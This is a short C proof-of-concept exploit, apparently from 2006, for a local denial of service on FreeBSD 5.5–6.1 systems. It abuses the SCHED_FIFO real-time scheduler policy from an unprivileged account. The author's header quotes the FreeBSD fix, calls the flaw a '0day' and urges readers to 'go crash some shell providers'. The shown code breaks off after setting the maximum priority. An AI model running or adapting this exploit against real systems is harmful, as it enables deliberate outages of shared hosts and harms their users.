/* FreeBSD cvs commit: src/sys/posix4/p1003_1b.c davidxu 2006-05-21 00:40:38 UTC
Log: Don't allow non-root user to set a scheduler policy, otherwise this could be a local DOS.
lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
tested on FreeBSD 5.5-RELEASE, 6.0-RELEASE-p5, 6.1-RELEASE, 6.1-RELEASE-p10 (latest at the time of writing)
wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
#include <sched.h>
int main(){
struct sched_param lol;
lol.sched_priority = sched_get_priority_max(SCHED_FIFO);